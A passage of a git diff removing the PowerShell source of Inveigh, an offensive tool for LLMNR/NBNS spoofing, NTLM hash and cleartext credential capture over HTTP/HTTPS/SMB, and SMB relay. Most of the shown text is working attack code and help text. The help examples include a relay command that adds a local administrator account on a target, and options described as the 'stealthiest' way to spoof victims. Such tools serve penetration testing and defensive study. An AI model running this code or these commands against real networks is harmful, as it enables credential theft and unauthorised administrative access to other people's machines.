- $inveigh.HTTP_listener.Prefixes.Add('https://*:443/') - } - - $inveigh.HTTP_listener.AuthenticationSchemes = "Anonymous" - $inveigh.HTTP_listener.Start() - $HTTP_runspace = [RunspaceFactory]::CreateRunspace() - $HTTP_runspace.Open() - $HTTP_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) - $HTTP_powershell = [PowerShell]::Create() - $HTTP_powershell.Runspace = $HTTP_runspace - $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null - $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null - $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null - $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null - $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument( - $SMBRelayTarget).AddArgument($SMBRelayCommand).AddArgument($SMBRelayUsernames).AddArgument( - $SMBRelayAutoDisable).AddArgument($SMBRelayNetworkTimeout).AddArgument($WPADAuth) > $null - $HTTP_powershell.BeginInvoke() > $null -} - -# Control Relay Startup function -function ControlRelayLoop() -{ - $control_relay_runspace = [RunspaceFactory]::CreateRunspace() - $control_relay_runspace.Open() - $control_relay_runspace.SessionStateProxy.SetVariable('inveigh',$inveigh) - $control_relay_powershell = [PowerShell]::Create() - $control_relay_powershell.Runspace = $control_relay_runspace - $control_relay_powershell.AddScript($shared_basic_functions_scriptblock) > $null - $control_relay_powershell.AddScript($control_relay_scriptblock).AddArgument($RunTime) > $null - $control_relay_powershell.BeginInvoke() > $null -} - -# HTTP Server Start -if($inveigh.HTTP -or $inveigh.HTTPS) -{ - HTTPListener -} - -# Control Relay Loop Start -if($RunTime -or $inveigh.file_output) -{ - ControlRelayLoop -} - -if(!$inveigh.running -and $inveigh.console_output) -{ - - :console_loop while($inveigh.relay_running -and $inveigh.console_output) - { - - while($inveigh.console_queue.Count -gt 0) - { - - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else - { - - switch -wildcard ($inveigh.console_queue[0]) - { - - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } - - "* for relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - } - - } - - } - - if($inveigh.console_input) - { - - if([Console]::KeyAvailable) - { - $inveigh.console_output = $false - BREAK console_loop - } - - } - - Start-Sleep -m 5 - } - -} - -} -#End Invoke-InveighRelay - -function Stop-Inveigh -{ - <# - .SYNOPSIS - Stop-Inveigh will stop all running Inveigh functions. - #> - - if($inveigh) - { - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) - { - - if($inveigh.HTTP_listener.IsListening) - { - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() - } - - if($inveigh.bruteforce_running) - { - $inveigh.bruteforce_running = $false - Write-Output("$(Get-Date -format 's') - Attempting to stop HTTP listener") - $inveigh.HTTP_listener.server.blocking = $false - Start-Sleep -s 1 - $inveigh.HTTP_listener.server.Close() - Start-Sleep -s 1 - $inveigh.HTTP_listener.Stop() - Write-Output("Inveigh Brute Force exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Brute Force exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Brute Force exited" | Out-File $Inveigh.log_out_file -Append - } - - } - - if($inveigh.relay_running) - { - $inveigh.relay_running = $false - Write-Output("Inveigh Relay exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh Relay exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh Relay exited" | Out-File $Inveigh.log_out_file -Append - } - - } - - if($inveigh.running) - { - $inveigh.running = $false - Write-Output("Inveigh exited at $(Get-Date -format 's')") - $inveigh.log.Add("$(Get-Date -format 's') - Inveigh exited") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - Inveigh exited" | Out-File $Inveigh.log_out_file -Append - } - - } - - } - else - { - Write-Output("There are no running Inveigh functions") - } - - if($inveigh.HTTPS) - { - & "netsh" http delete sslcert ipport=0.0.0.0:443 > $null - - try - { - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = $certificate_store.certificates.Find("FindByThumbprint",$inveigh.certificate_thumbprint,$FALSE)[0] - $certificate_store.Remove($certificate) - $certificate_store.Close() - } - catch - { - Write-Output("SSL Certificate Deletion Error - Remove Manually") - $inveigh.log.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually") > $null - - if($inveigh.file_output) - { - "$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually" | Out-File $Inveigh.log_out_file -Append - } - - } - } - - $inveigh.HTTP = $false - $inveigh.HTTPS = $false - } - else - { - Write-Output("There are no running Inveigh functions")|Out-Null - } - -} - -function Get-Inveigh -{ - <# - .SYNOPSIS - Get-Inveigh will display queued Inveigh console output. - #> - - while($inveigh.console_queue.Count -gt 0) - { - - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else - { - - switch -wildcard ($inveigh.console_queue[0]) - { - - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } - - "* for relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - } - - } - - } - -} - -function Get-InveighCleartext -{ - <# - .SYNOPSIS - Get-InveighCleartext will get all captured cleartext credentials. - - .PARAMETER Unique - Display only unique cleartext credentials. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(ValueFromRemainingArguments=$true)] $invalid_parameter - ) - - if($Unique) - { - Write-Output $inveigh.cleartext_list | Get-Unique - } - else - { - Write-Output $inveigh.cleartext_list - } - -} - -function Get-InveighNTLMv1 -{ - <# - .SYNOPSIS - Get-InveighNTLMv1 will get captured NTLMv1 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. - - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) - - if ($invalid_parameter) - { - throw "$($invalid_parameter) is not a valid parameter." - } - - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } - - if($Unique) - { - $inveigh.NTLMv1_list.Sort() - - foreach($unique_NTLMv1 in $inveigh.NTLMv1_list) - { - $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) - - if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) - { - Write-Output $unique_NTLMv1 - } - - $unique_NTLMv1_account_last = $unique_NTLMv1_account - } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv1_username_list - } - else - { - Write-Output $inveigh.NTLMv1_list - } - -} - -function Get-InveighNTLMv2 -{ - <# - .SYNOPSIS - Get-InveighNTLMv2 will get captured NTLMv2 challenge/response hashes. - - .PARAMETER Unique - Display only the first captured challenge/response for each unique account. - - .PARAMETER Usernames - Display IP addresses and usernames for captured NTLMv2 challenge response hashes. - #> - - param - ( - [parameter(Mandatory=$false)][Switch]$Unique, - [parameter(Mandatory=$false)][Switch]$Usernames, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter - ) - - if($invalid_parameter) - { - throw "$($invalid_parameter) is not a valid parameter." - } - - if($Unique -and $Usernames) - { - throw "Cannot use -Unique with -Usernames." - } - - if($Unique) - { - $inveigh.NTLMv2_list.Sort() - - foreach($unique_NTLMv2 in $inveigh.NTLMv2_list) - { - $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) - - if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) - { - Write-Output $unique_NTLMv2 - } - - $unique_NTLMv2_account_last = $unique_NTLMv2_account - } - } - elseif($Usernames) - { - Write-Output $inveigh.NTLMv2_username_list - } - else - { - Write-Output $inveigh.NTLMv2_list - } - -} - -function Get-InveighLog -{ - <# - .SYNOPSIS - Get-InveighLog will get log entries. - #> - - Write-Output $inveigh.log -} - -function Watch-Inveigh -{ - <# - .SYNOPSIS - Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. - #> - - if($inveigh.tool -ne 1) - { - - if($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) - { - Write-Output "Press any key to stop real time console output" - $inveigh.console_output = $true - - :console_loop while((($inveigh.running -or $inveigh.relay_running -or $inveigh.bruteforce_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) - { - - while($inveigh.console_queue.Count -gt 0) - { - - if($inveigh.output_stream_only) - { - Write-Output($inveigh.console_queue[0] + $inveigh.newline) - $inveigh.console_queue.RemoveRange(0,1) - } - else - { - - switch -wildcard ($inveigh.console_queue[0]) - { - - "Inveigh *exited *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* written to *" - { - - if($inveigh.file_output) - { - Write-Warning $inveigh.console_queue[0] - } - - $inveigh.console_queue.RemoveRange(0,1) - } - - "* for relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "*SMB relay *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - "* local administrator *" - { - Write-Warning $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - default - { - Write-Output $inveigh.console_queue[0] - $inveigh.console_queue.RemoveRange(0,1) - } - - } - - } - - } - - if([Console]::KeyAvailable) - { - $inveigh.console_output = $false - BREAK console_loop - } - - Start-Sleep -m 5 - } - - } - else - { - Write-Output "Inveigh isn't running" - } - - } - else - { - Write-Output "Watch-Inveigh cannot be used with current external tool selection" - } - -} - -function Clear-Inveigh -{ - <# - .SYNOPSIS - Clear-Inveigh will clear Inveigh data from memory. - #> - - if($inveigh) - { - - if(!$inveigh.running -and !$inveigh.relay_running -and !$inveigh.bruteforce_running) - { - Remove-Variable inveigh -scope global - Write-Output "Inveigh data has been cleared from memory" - } - else - { - Write-Output "Run Stop-Inveigh before running Clear-Inveigh" - } - - } - -} diff --git a/scripts/Inveigh.ps1 b/scripts/Inveigh.ps1 deleted file mode 100644 index 51a27f8..0000000 --- a/scripts/Inveigh.ps1 +++ /dev/null @@ -1,2451 +0,0 @@ -function Invoke-Inveigh -{ -<# -.SYNOPSIS -Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/HTTPS/SMB. - -.DESCRIPTION -Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following features: - - IPv4 LLMNR/NBNS spoofer with granular control - NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/SMB - Basic auth cleartext credential capture over HTTP/HTTPS - WPAD server capable of hosting a basic or custom wpad.dat file - HTTP/HTTPS server capable of hosting limited content - Granular control of console and file output - Run time control - -.PARAMETER IP -Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if -the SpooferIP parameter is not set. - -.PARAMETER SpooferIP -Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a -system other than the Inveigh host. - -.PARAMETER SpooferHostsReply -Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. - -.PARAMETER SpooferHostsIgnore -Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. - -.PARAMETER SpooferIPsReply -Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. - -.PARAMETER SpooferIPsIgnore -Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. - -.PARAMETER SpooferRepeat -Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user -challenge/response has been captured. - -.PARAMETER LLMNR -Default = Enabled: (Y/N) Enable/Disable LLMNR spoofing. - -.PARAMETER LLMNRTTL -Default = 30 Seconds: Specify a custom LLMNR TTL in seconds for the response packet. - -.PARAMETER NBNS -Default = Disabled: (Y/N) Enable/Disable NBNS spoofing. - -.PARAMETER NBNSTTL -Default = 165 Seconds: Specify a custom NBNS TTL in seconds for the response packet. - -.PARAMETER NBNSTypes -Default = 00,20: Comma separated list of NBNS types to spoof. -Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name - -.PARAMETER HTTP -Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. - -.PARAMETER HTTPS -Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in -the local store and attached to port 443. If the script does not exit gracefully, execute -"netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" -in the cert store. - -.PARAMETER HTTPAuth -Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type. This setting does not -apply to wpad.dat requests. - -.PARAMETER HTTPBasicRealm -Specify a realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. - -.PARAMETER HTTPDir -Specify a full directory path to enable hosting of basic content through the HTTP/HTTPS listener. - -.PARAMETER HTTPDefaultFile -Specify a filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used -for wpad.dat requests. - -.PARAMETER HTTPDefaultEXE -Specify an EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. - -.PARAMETER HTTPResponse -Specify a string or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat -requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. - -.PARAMETER HTTPSCertAppID -Specify a valid application GUID for use with the ceriticate. - -.PARAMETER HTTPSCertThumbprint -Specify a certificate thumbprint for use with a custom certificate. The certificate filename must be located in -the current working directory and named Inveigh.pfx. - -.PARAMETER WPADAuth -Default = NTLM: (Anonymous,Basic,NTLM) Specify the HTTP/HTTPS server authentication type for wpad.dat requests. -Setting to Anonymous can prevent browser login prompts. - -.PARAMETER WPADEmptyFile -Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. -Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when -using WPADIP, WPADPort, or WPADResponse. - -.PARAMETER WPADIP -Specify a proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter -must be used with WPADPort. - -.PARAMETER WPADPort -Specify a proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter -must be used with WPADIP. - -.PARAMETER WPADDirectHosts -Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the -defined proxy. - -.PARAMETER WPADResponse -Specify wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and -WPADPort are set. Use PowerShell character escapes where necessary. - -.PARAMETER SMB -Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still -direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to -prevent login requests from being processed by the Inveigh host. - -.PARAMETER Challenge -Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a -random challenge will be generated for each request. This will only be used for non-relay captures. - -.PARAMETER MachineAccounts -Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. - -.PARAMETER SMBRelay -Default = Disabled: (Y/N) Enable/Disable SMB relay. Note that Inveigh-Relay.ps1 must be loaded into memory. - -.PARAMETER SMBRelayTarget -IP address of system to target for SMB relay. - -.PARAMETER SMBRelayCommand -Command to execute on SMB relay target. - -.PARAMETER SMBRelayUsernames -Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and -domain\username format. - -.PARAMETER SMBRelayAutoDisable -Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. - -.PARAMETER SMBRelayNetworkTimeout -Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay - target after each packet is sent. - -.PARAMETER ConsoleOutput -Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to -ensure that it doesn't hang the shell. - -.PARAMETER ConsoleStatus -(Integer) Set interval in minutes for displaying all unique captured hashes and credentials. This is useful for -displaying full capture lists when running through a shell that does not have access to the support functions. - -.PARAMETER ConsoleUnique -Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, -and username combinations when real time console output is enabled. - -.PARAMETER FileOutput -Default = Disabled: (Y/N) Enable/Disable real time file output. - -.PARAMETER FileUnique -Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, -and username combinations when real time file output is enabled. - -.PARAMETER StatusOutput -Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. - -.PARAMETER OutputStreamOnly -Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if -running Inveigh through a shell that does not return other output streams.Note that you will not see the various -yellow warning messages if enabled. - -.PARAMETER OutputDir -Default = Working Directory: Set a valid path to an output directory for log and capture files. FileOutput must -also be enabled. - -.PARAMETER RunTime -(Integer) Set the run time duration in minutes. - -.PARAMETER ShowHelp -Default = Enabled: (Y/N) Enable/Disable the help messages at startup. - -.PARAMETER Inspect -(Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic. - -.PARAMETER Tool -Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's -Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire - -.EXAMPLE -Import-Module .\Inveigh.psd1;Invoke-Inveigh -Import full module and execute with all default settings. - -.EXAMPLE -. ./Inveigh.ps1;Invoke-Inveigh -IP 192.168.1.10 -Dot source load and execute specifying a specific local listening/spoofing IP. - -.EXAMPLE -Invoke-Inveigh -IP 192.168.1.10 -HTTP N -Execute specifying a specific local listening/spoofing IP and disabling HTTP challenge/response. - -.EXAMPLE -Invoke-Inveigh -SpooferRepeat N -WPADAuth Anonymous -SpooferHostsReply host1,host2 -SpooferIPsReply 192.168.2.75,192.168.2.76 -Execute with the stealthiest options. - -.EXAMPLE -Invoke-Inveigh -Inspect -Execute with LLMNR, NBNS, SMB, HTTP, and HTTPS disabled in order to only inpect LLMNR/NBNS traffic. - -.EXAMPLE -Invoke-Inveigh -IP 192.168.1.10 -SpooferIP 192.168.2.50 -HTTP N -Execute specifying a specific local listening IP and a LLMNR/NBNS spoofing IP on another subnet. This may be -useful for sending traffic to a controlled Linux system on another subnet. - -.EXAMPLE -Invoke-Inveigh -HTTPResponse "" -Execute specifying an HTTP redirect response. - -.EXAMPLE -Invoke-Inveigh -SMBRelay y -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Spring2016 /add && net localgroup administrators Dave /add" -Execute with SMB relay enabled with a command that will create a local administrator account on the SMB relay -target. - -.NOTES -1. An elevated administrator or SYSTEM shell is needed. -2. Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/HTTPS/SMB NTLMv1/NTLMv2 challenge/response capture. -3. LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets. -4. SMB challenge/response captures are performed by sniffing over the host system's SMB service. -5. HTTP challenge/response captures are performed with a dedicated listener. -6. The local LLMNR/NBNS services do not need to be disabled on the host system. -7. LLMNR/NBNS spoofer will point victims to host system's SMB service, keep account lockout scenarios in mind. -8. Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS. -9. Ensure that the LMMNR,NBNS,SMB,HTTP ports are open within any local firewall on the host system. -10. If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns. - -.LINK -https://github.com/Kevin-Robertson/Inveigh -#> - -# Parameter default values can be modified in this section: -[CmdletBinding()] -param -( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelay="N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable="Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile="Y", - [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool="0", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth="NTLM", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth="NTLM", - [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes=@("00","20"), - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP="", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP="", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget ="", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir="", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir="", - [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge="", - [parameter(Mandatory=$false)][Array]$SpooferHostsReply="", - [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore="", - [parameter(Mandatory=$false)][Array]$SpooferIPsReply="", - [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore="", - [parameter(Mandatory=$false)][Array]$SMBRelayUsernames="", - [parameter(Mandatory=$false)][Array]$WPADDirectHosts="", - [parameter(Mandatory=$false)][Int]$ConsoleStatus="", - [parameter(Mandatory=$false)][Int]$LLMNRTTL="30", - [parameter(Mandatory=$false)][Int]$NBNSTTL="165", - [parameter(Mandatory=$false)][Int]$WPADPort="", - [parameter(Mandatory=$false)][Int]$RunTime="", - [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout="", - [parameter(Mandatory=$false)][String]$HTTPBasicRealm="IIS", - [parameter(Mandatory=$false)][String]$HTTPDefaultFile="", - [parameter(Mandatory=$false)][String]$HTTPDefaultEXE="", - [parameter(Mandatory=$false)][String]$HTTPResponse="", - [parameter(Mandatory=$false)][String]$HTTPSCertAppID="00112233-4455-6677-8899-AABBCCDDEEFF", - [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint="98c1d54840c5c12ced710758b6ee56cc62fa1f0d", - [parameter(Mandatory=$false)][String]$WPADResponse="", - [parameter(Mandatory=$false)][String]$SMBRelayCommand="", - [parameter(Mandatory=$false)][Switch]$Inspect, - [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter -) - -if ($invalid_parameter) -{ - throw "$($invalid_parameter) is not a valid parameter." -} - -if(!$IP) -{ - $IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) -} - -if(!$SpooferIP) -{ - $SpooferIP = $IP -} - -if($SMBRelay -eq 'Y') -{ - - if(!$SMBRelayTarget) - { - throw "You must specify an -SMBRelayTarget if enabling -SMBRelay" - } - - if(!$SMBRelayCommand) - { - throw "You must specify an -SMBRelayCommand if enabling -SMBRelay" - } - - if($Challenge -or $HTTPDefaultFile -or $HTTPDefaultEXE -or $HTTPResponse -or $WPADIP -or $WPADPort -or $WPADResponse) - { - throw "-Challenge -HTTPDefaultFile, -HTTPDefaultEXE, -HTTPResponse, -WPADIP, -WPADPort, and -WPADResponse can not be used when enabling -SMBRelay" - } - elseif($HTTPAuth -ne 'NTLM' -or $WPADAuth -eq 'Basic') - { - throw "Only -HTTPAuth NTLM, -WPADAuth NTLM, and -WPADAuth Anonymous can be used when enabling -SMBRelay" - } - -} - -if($HTTPDefaultFile -or $HTTPDefaultEXE) -{ - - if(!$HTTPDir) - { - throw "You must specify an -HTTPDir when using either -HTTPDefaultFile or -HTTPDefaultEXE" - } - -} - -if($WPADIP -or $WPADPort) -{ - - if(!$WPADIP) - { - throw "You must specify a -WPADPort to go with -WPADIP" - } - - if(!$WPADPort) - { - throw "You must specify a -WPADIP to go with -WPADPort" - } - -} - -if(!$OutputDir) -{ - $output_directory = $PWD.Path -} -else -{ - $output_directory = $OutputDir -} - -if(!$inveigh) -{ - $global:inveigh = [HashTable]::Synchronized(@{}) - $inveigh.log = New-Object System.Collections.ArrayList - $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList - $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList - $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList - $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList - $inveigh.cleartext_list = New-Object System.Collections.ArrayList - $inveigh.IP_capture_list = New-Object System.Collections.ArrayList - $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList -} - -if($inveigh.running) -{ - throw "Invoke-Inveigh is already running, use Stop-Inveigh" -} -elseif($inveigh.relay_running) -{ - throw "Invoke-InveighRelay is already running, use Stop-Inveigh" -} - -$inveigh.sniffer_socket = $null - -if($inveigh.HTTP_listener.IsListening) -{ - $inveigh.HTTP_listener.Stop() - $inveigh.HTTP_listener.Close() -} - -$inveigh.console_queue = New-Object System.Collections.ArrayList -$inveigh.status_queue = New-Object System.Collections.ArrayList -$inveigh.log_file_queue = New-Object System.Collections.ArrayList -$inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList -$inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList -$inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList -$inveigh.certificate_application_ID = $HTTPSCertAppID -$inveigh.certificate_thumbprint = $HTTPSCertThumbprint -$inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList -$inveigh.console_output = $false -$inveigh.console_input = $true -$inveigh.file_output = $false -$inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" -$inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" -$inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" -$inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" -$inveigh.HTTP_response = $HTTPResponse -$inveigh.HTTP_directory = $HTTPDir -$inveigh.HTTP_default_file = $HTTPDefaultFile -$inveigh.HTTP_default_exe = $HTTPDefaultEXE -$inveigh.WPAD_response = $WPADResponse -$inveigh.challenge = $Challenge -$inveigh.running = $true - -if($StatusOutput -eq 'Y') -{ - $inveigh.status_output = $true -} -else -{ - $inveigh.status_output = $false -} - -if($OutputStreamOnly -eq 'Y') -{ - $inveigh.output_stream_only = $true -} -else -{ - $inveigh.output_stream_only = $false -} - -if($Inspect) -{ - $LLMNR = "N" - $NBNS = "N" - $HTTP = "N" - $HTTPS = "N" - $SMB = "N" -} - -if($Tool -eq 1) # Metasploit Interactive PowerShell -{ - $inveigh.tool = 1 - $inveigh.output_stream_only = $true - $inveigh.newline = "" - $ConsoleOutput = "N" -} -elseif($Tool -eq 2) # PowerShell Empire -{ - $inveigh.tool = 2 - $inveigh.output_stream_only = $true - $inveigh.console_input = $false - $inveigh.newline = "`n" - $ConsoleOutput = "Y" - $ShowHelp = "N" -} -else -{ - $inveigh.tool = 0 - $inveigh.newline = "" -} - -# Write startup messages -$inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')") > $null 